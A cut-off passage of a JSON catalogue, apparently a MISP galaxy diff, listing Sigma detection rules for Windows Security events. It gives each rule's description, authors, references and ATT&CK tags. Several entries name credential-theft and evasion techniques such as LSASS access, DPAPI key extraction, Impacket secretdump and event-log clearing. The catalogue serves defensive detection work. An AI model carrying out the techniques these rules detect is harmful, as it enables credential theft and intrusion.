"2019/10/26", + "falsepositive": [ + "Intended inclusions by administrator" + ], + "filename": "win_security_defender_bypass.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + 
"https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_defender_bypass.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d", + "value": "Windows Defender Exclusion Set" + }, + { + "description": "Detects an installation of a device that is forbidden by the system policy", + "meta": { + "author": "frack113", + "creation_date": "2022/10/14", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_device_installation_blocked.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6423", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_device_installation_blocked.yml" + ], + "tags": "No established tags" + }, + "uuid": "c9eb55c3-b468-40ab-9089-db2862e42137", + "value": "Device Installation Blocked" + }, + { + "description": "Detects the default \"UserName\" used by the DiagTrackEoP POC", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/03", + "falsepositive": [ + "Unlikely" + ], + "filename": "win_security_diagtrack_eop_default_login_username.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L46", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_diagtrack_eop_default_login_username.yml" + ], + "tags": [ + "attack.privilege_escalation" + ] + }, + 
"uuid": "2111118f-7e46-4fc8-974a-59fd8ec95196", + "value": "DiagTrackEoP Default Login Username" + }, + { + "description": "Detects scenarios where system auditing (ie: windows event log auditing) is disabled.\nThis may be used in a scenario where an entity would want to bypass local logging to evade detection when windows event logging is enabled and reviewed.\nAlso, it is recommended to turn off \"Local Group Policy Object Processing\" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as \"gpedit.msc\".\nPlease note, that disabling \"Local Group Policy Object Processing\" may cause an issue in scenarios of one off specific GPO modifications -- however it is recommended to perform these modifications in Active Directory anyways.\n", + "meta": { + "author": "@neu5ron", + "creation_date": "2017/11/19", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_disable_event_logging.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.google.com/presentation/d/1dkrldTTlN3La-OjWtkWJBb4hVk6vfsSMBFBERs6R8zA/edit", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_disable_event_logging.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ] + }, + "uuid": "69aeb277-f15f-4d2d-b32a-55e883609563", + "value": "Disabling Windows Event Auditing" + }, + { + "description": "Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/06/20", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_dpapi_domain_backupkey_extraction.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + 
"https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-190620024610.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dpapi_domain_backupkey_extraction.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.004" + ] + }, + "uuid": "4ac1f50b-3bd0-4968-902d-868b4647937e", + "value": "DPAPI Domain Backup Key Extraction" + }, + { + "description": "Detects anyone attempting a backup for the DPAPI Master Key. This events gets generated at the source and not the Domain Controller.", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/08/10", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_dpapi_domain_masterkey_backup_attempt.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-190620024610.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dpapi_domain_masterkey_backup_attempt.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.004" + ] + }, + "uuid": "39a94fd1-8c9a-4ff6-bf22-c058762f8014", + "value": "DPAPI Domain Master Key Backup Attempt" + }, + { + "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/06/05", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_etw_modification.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/_xpn_/status/1268712093928378368", + "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", + 
"https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", + "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", + "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", + "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", + "https://bunnyinside.com/?term=f71e8cb9c76a", + "http://managed670.rssing.com/chan-5590147/all_p1.html", + "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_etw_modification.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "a4c90ea1-2634-4ca0-adbb-35eae169b6fc", + "value": "COMPlus_ETWEnabled Registry Modification" + }, + { + "description": "Checks for event id 1102 which indicates the security event log was cleared.", + "meta": { + "author": "Saw Winn Naung", + "creation_date": "2021/08/15", + "falsepositive": [ + "Legitimate administrative activity" + ], + "filename": "win_security_event_log_cleared.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/SecurityEventLogCleared.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_event_log_cleared.yml" + ], + "tags": [ + "attack.t1070.001" + ] + }, + "uuid": "a122ac13-daf8-4175-83a2-72c387be339d", + "value": "Security Event Log Cleared" + }, + { + "description": "Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful 
exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527", + "meta": { + "author": "INIT_6", + "creation_date": "2021/07/02", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_exploit_cve_2021_1675_printspooler_security.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/INIT_3/status/1410662463641731075", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_exploit_cve_2021_1675_printspooler_security.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569", + "cve.2021.1675", + "cve.2021.34527" + ] + }, + "uuid": "8fe1c584-ee61-444b-be21-e9054b229694", + "value": "CVE-2021-1675 Print Spooler Exploitation IPC Access" + }, + { + "description": "Detects external diskdrives or plugged in USB devices , EventID 6416 on windows 10 or later", + "meta": { + "author": "Keith Wright", + "creation_date": "2019/11/20", + "falsepositive": [ + "Legitimate administrative activity" + ], + "filename": "win_security_external_device.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_external_device.yml" + ], + "tags": [ + "attack.t1091", + "attack.t1200", + "attack.lateral_movement", + "attack.initial_access" + ] + }, + "uuid": "f69a87ea-955e-4fb4-adb2-bb9fd6685632", + "value": "External Disk Drive Or USB Storage Device" + }, + { + "description": "Detects enumeration of the global catalog (that can be performed using BloodHound or others AD reconnaissance tools). Adjust Threshold according to domain width.", + "meta": { + "author": "Chakib Gzenayi (@Chak092), Hosni Mribah", + "creation_date": "2020/05/11", + "falsepositive": [ + "Exclude known DCs." 
+ ], + "filename": "win_security_global_catalog_enumeration.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5156", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_global_catalog_enumeration.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.002" + ] + }, + "uuid": "619b020f-0fd7-4f23-87db-3f51ef837a34", + "value": "Enumeration via the Global Catalog" + }, + { + "description": "Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale", + "meta": { + "author": "Samir Bousseaden", + "creation_date": "2019/04/03", + "falsepositive": [ + "If the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduledtasks" + ], + "filename": "win_security_gpo_scheduledtasks.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/menasec1/status/1106899890377052160", + "https://www.secureworks.com/blog/ransomware-as-a-distraction", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_gpo_scheduledtasks.yml" + ], + "tags": [ + "attack.persistence", + "attack.lateral_movement", + "attack.t1053.005" + ] + }, + "uuid": "a8f29a7b-b137-4446-80a0-b804272f3da2", + "value": "Persistence and Execution at Scale via GPO Scheduled Task" + }, + { + "description": "Detects the creation of a local hidden user account which should not happen for event ID 4720.", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/05/03", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_hidden_user_creation.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + 
"https://twitter.com/SBousseaden/status/1387743867663958021", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_hidden_user_creation.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.001" + ] + }, + "uuid": "7b449a5e-1db5-4dd0-a2dc-4e3a67282538", + "value": "Hidden Local User Creation" + }, + { + "description": "Rule to detect the Hybrid Connection Manager service installation.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2021/04/12", + "falsepositive": [ + "Legitimate use of Hybrid Connection Manager via Azure function apps." + ], + "filename": "win_security_hybridconnectionmgr_svc_installation.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Cyb3rWard0g/status/1381642789369286662", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_hybridconnectionmgr_svc_installation.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1554" + ] + }, + "uuid": "0ee4d8a5-4e67-4faf-acfa-62a78457d1f2", + "value": "HybridConnectionManager Service Installation" + }, + { + "description": "Detects execution of Impacket's psexec.py.", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2020/12/14", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_impacket_psexec.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_impacket_psexec.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "32d56ea1-417f-44ff-822b-882873f5f43b", + "value": "Impacket PsExec Execution" + }, + { + "description": "Detect AD credential dumping using impacket 
secretdump HKTL", + "meta": { + "author": "Samir Bousseaden, wagga", + "creation_date": "2019/04/03", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_impacket_secretdump.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_impacket_secretdump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.003" + ] + }, + "uuid": "252902e3-5830-4cf6-bf21-c22083dfd5cf", + "value": "Possible Impacket SecretDump Remote Activity" + }, + { + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "meta": { + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_invoke_obfuscation_clip_services_security.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_clip_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "4edf51e1-cb83-4e1a-bc39-800e396068e3", + "value": "Invoke-Obfuscation CLIP+ Launcher - Security" + }, + { + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", + "meta": { + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "creation_date": "2019/11/08", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_invoke_obfuscation_obfuscated_iex_services_security.yml", + "level": "high", + 
"logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_obfuscated_iex_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "fd0f5778-d3cb-4c9a-9695-66759d04702a", + "value": "Invoke-Obfuscation Obfuscated IEX Invocation - Security" + }, + { + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "meta": { + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/15", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_invoke_obfuscation_stdin_services_security.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_stdin_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "0c718a5e-4284-4fb9-b4d9-b9a50b3a1974", + "value": "Invoke-Obfuscation STDIN+ Launcher - Security" + }, + { + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "meta": { + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/15", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_invoke_obfuscation_var_services_security.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_var_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "dcf2db1f-f091-425b-a821-c05875b8925a", + "value": "Invoke-Obfuscation VAR+ Launcher - Security" + }, + { + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/18", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_invoke_obfuscation_via_compress_services_security.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_compress_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "7a922f1b-2635-4d6c-91ef-af228b198ad3", + "value": "Invoke-Obfuscation COMPRESS OBFUSCATION - Security" + }, + { + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/18", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_invoke_obfuscation_via_rundll_services_security.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_rundll_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "f241cf1b-3a6b-4e1a-b4f9-133c00dd95ca", + "value": 
"Invoke-Obfuscation RUNDLL LAUNCHER - Security" + }, + { + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_invoke_obfuscation_via_stdin_services_security.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_stdin_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "80b708f3-d034-40e4-a6c8-d23b7a7db3d1", + "value": "Invoke-Obfuscation Via Stdin - Security" + }, + { + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_invoke_obfuscation_via_use_clip_services_security.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_use_clip_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "1a0a2ff1-611b-4dac-8216-8a7b47c618a6", + "value": "Invoke-Obfuscation Via Use Clip - Security" + }, + { + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_invoke_obfuscation_via_use_mshta_services_security.yml", + 
"level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_use_mshta_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a", + "value": "Invoke-Obfuscation Via Use MSHTA - Security" + }, + { + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_invoke_obfuscation_via_use_rundll32_services_security.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_use_rundll32_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "cd0f7229-d16f-42de-8fe3-fba365fbcb3a", + "value": "Invoke-Obfuscation Via Use Rundll32 - Security" + }, + { + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_invoke_obfuscation_via_var_services_security.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_var_services_security.yml" + ], + "tags": [ + 
"attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "4c54ba8f-73d2-4d40-8890-d9cf1dca3d30", + "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security" + }, + { + "description": "Detects the mount of ISO images on an endpoint", + "meta": { + "author": "Syed Hasan (@syedhasan009)", + "creation_date": "2021/05/29", + "falsepositive": [ + "Software installation ISO files" + ], + "filename": "win_security_iso_mount.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore", + "https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages", + "https://twitter.com/MsftSecIntel/status/1257324139515269121", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_iso_mount.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1566.001" + ] + }, + "uuid": "0248a7bc-8a9a-4cd8-a57e-3ae8e073a073", + "value": "ISO Image Mount" + }, + { + "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", + "meta": { + "author": "Samir Bousseaden", + "creation_date": "2019/04/03", + "falsepositive": [ + "Update the excluded named pipe to filter out any newly observed legit named pipe" + ], + "filename": "win_security_lm_namedpipe.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/menasec1/status/1104489274387451904", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_lm_namedpipe.yml" + ], + "tags": [ + "attack.lateral_movement", + 
"attack.t1021.002" + ] + }, + "uuid": "52d8b0c6-53d6-439a-9e41-52ad442ad9ad", + "value": "First Time Seen Remote Named Pipe" + }, + { + "description": "The attacker might use LOLBAS nltest.exe for discovery of domain controllers, domain trusts, parent domain and the current user permissions.", + "meta": { + "author": "Arun Chauhan", + "creation_date": "2021/10/04", + "falsepositive": [ + "Red team activity", + "Rare legitimate use by an administrator" + ], + "filename": "win_security_lolbas_execution_of_nltest.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/nltest.htm", + "https://attack.mitre.org/software/S0359/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_lolbas_execution_of_nltest.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1482", + "attack.t1018", + "attack.t1016" + ] + }, + "uuid": "eeb66bbb-3dde-4582-815a-584aee9fe6d1", + "value": "Correct Execution of Nltest.exe" + }, + { + "description": "Detects potential mimikatz-like tools accessing LSASS from non system account", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/06/20", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_lsass_access_non_system_account.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-170105221010.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_lsass_access_non_system_account.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "962fe167-e48d-4fd6-9974-11e5b9a5d6d1", + "value": "LSASS Access from Non System Account" + }, + { + "description": "Detects well-known credential dumping tools execution via service 
execution events", + "meta": { + "author": "Florian Roth, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2017/03/05", + "falsepositive": [ + "Legitimate Administrator using credential dumping tool for password recovery" + ], + "filename": "win_security_mal_creddumper.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_mal_creddumper.yml" + ], + "tags": [ + "attack.credential_access", + "attack.execution", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006", + "attack.t1569.002", + "attack.s0005" + ] + }, + "uuid": "f0d1feba-4344-4ca9-8121-a6c97bd6df52", + "value": "Credential Dumping Tools Service Execution - Security" + }, + { + "description": "Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.", + "meta": { + "author": "Florian Roth, Daniil Yugoslavskiy, oscd.community (update)", + "creation_date": "2017/03/27", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_mal_service_installs.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://awakesecurity.com/blog/threat-hunting-for-paexec/", + "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html", + "https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_mal_service_installs.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1003", + "car.2013-09-005", + "attack.t1543.003", + "attack.t1569.002" + ] + }, + "uuid": 
"cb062102-587e-4414-8efa-dbe3c7bf19c6", + "value": "Malicious Service Installations" + }, + { + "description": "Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2017/06/14", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_mal_wceaux_dll.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", + "https://jpcertcc.github.io/ToolAnalysisResultSheet", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_mal_wceaux_dll.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003", + "attack.s0005" + ] + }, + "uuid": "1de68c67-af5c-4097-9c85-fe5578e09e67", + "value": "WCE wceaux.dll Access" + }, + { + "description": "Alerts on Metasploit host's authentications on the domain.", + "meta": { + "author": "Chakib Gzenayi (@Chak092), Hosni Mribah", + "creation_date": "2020/05/06", + "falsepositive": [ + "Linux hostnames composed of 16 characters." 
+ ], + "filename": "win_security_metasploit_authentication.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/rapid7/metasploit-framework/blob/1416b5776d963f21b7b5b45d19f3e961201e0aed/lib/rex/proto/smb/client.rb", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_metasploit_authentication.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "72124974-a68b-4366-b990-d30e0b2a190d", + "value": "Metasploit SMB Authentication" + }, + { + "description": "Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation", + "meta": { + "author": "Bartlomiej Czyz, Relativity", + "creation_date": "2021/01/21", + "falsepositive": [ + "Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name" + ], + "filename": "win_security_metasploit_or_impacket_smb_psexec_service_install.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://bczyz1.github.io/2021/01/30/psexec.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_metasploit_or_impacket_smb_psexec_service_install.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1570", + "attack.execution", + "attack.t1569.002" + ] + }, + "uuid": "6fb63b40-e02a-403e-9ffd-3bcc1d749442", + "value": "Metasploit Or Impacket Service Installation Via SMB PsExec" + }, + { + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", + "meta": { + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "creation_date": "2019/10/26", + "falsepositive": [ + "Highly unlikely" + ], + "filename": 
